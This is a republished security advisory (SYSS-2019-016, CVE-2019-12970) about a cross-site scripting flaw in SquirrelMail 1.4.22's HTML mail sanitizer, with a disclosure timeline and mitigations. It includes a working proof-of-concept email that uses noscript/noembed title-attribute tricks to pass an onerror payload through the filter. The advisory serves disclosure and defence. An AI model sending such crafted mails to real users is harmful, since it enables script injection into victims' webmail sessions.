what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SquirrelMail 1.4.22 Cross Site Scripting

SquirrelMail 1.4.22 Cross Site Scripting
Posted Jul 1, 2019
Authored by Moritz Bechler | Site syss.de

SquirrelMail version 1.4.22 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-12970
SHA-256 | e0fade0e7c5216f5956fdcd3b89294dead81e66b576a08326b496cc18d4bc0f4

SquirrelMail 1.4.22 Cross Site Scripting

Change Mirror Download
Advisory ID: SYSS-2019-016
Product: SquirrelMail
Manufacturer: The SquirrelMail Project
Affected Version(s): 1.4.22, SVN
Tested Version(s): SVN
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-04-17
Solution Date: N/A
Public Disclosure: 2019-07-01
CVE Reference: CVE-2019-12970
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

SquirrelMail is a open-source webmail package.

The manufacturer describes the product as follows (see [1]):

"SquirrelMail is a standards-based webmail package written in PHP.
It includes built-in pure PHP support for the IMAP and SMTP protocols,
and all pages render in pure HTML 4.0 (with no JavaScript required)
for maximum compatibility across browsers.
It has very few requirements and is very easy to configure and install.
SquirrelMail has all the functionality you would want from an email
client, including strong MIME support, address books, and folder
manipulation."

Due to insufficient HTML sanitization SquirrelMail is vulnerable to
Cross-Site-Scripting when viewing HTML mails.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When viewing e-mails in HTML mode (not active by default) SquirrelMail
applies a custom sanitization step in an effort to remove possibly
malicious script and other content from the viewed e-mail.

Due to improper handling of RCDATA and RAWTEXT type elements, the HTML
parser used in this process shows differences compared to real user
agent behavior. Exploiting these differences JavaScript code can be
introduced which is not removed.

Due to the blacklisting nature of this mechnanism multiple such element
types are allowed and not correctly handled, including the elements
noembed, noframes, noscript and textarea.

When using a construction like

<noembed>
<p title="</noembed><img src=x onerror=alert(1)>"></p>
</noembed>

SquirrelMail's parser will consider the included <img> tag as part
of the title attribute and therefore does not sanitize it's contents.

However, correctly parsing this, the <noembed> element ends at the
first closing tag and the <img> tag is actual content.

This allows having otherwise forbidden elements and attributes,
including ones containing malicious JavaScript code.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Send a HTML email to a victim user:

attacker> mail -a "Content-type: text/html" -s "My little pony" \
victim@example.com <<EOD
<html><head></head><body>
<noscript>
<p title="</noscript><img src=x onerror=alert(1)>"></p>
</noscript>
</body></html>
EOD

Viewing the recieved e-mail in HTML format the following HTML code
is produced. This code is interpreted by common browsers in a way
that the <img> tag with it's onerror handler is a regular tag,
and the embedded JavaScript code is executed.

<!-- begin sanitized html -->
<div class="bodyclass"><noscript><p title="</noscript>
<img src="SquirrelMail_files/x.html" onerror="alert(1)">"><p></p>
</div>

<!-- end sanitized html -->

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Avoid Squirrelmail, as it appears to be unmaintained.
Disable HTML viewing of messages.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-03: Vulnerability discovered
2019-04-17: Vulnerability reported to manufacturer
2019-05-03: No response, second attempt to contact manufacturer
2019-07-01: No response, public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for SquirrelMail
http://squirrelmail.org/
[2] SySS Security Advisory SYSS-2019-016

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-016.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close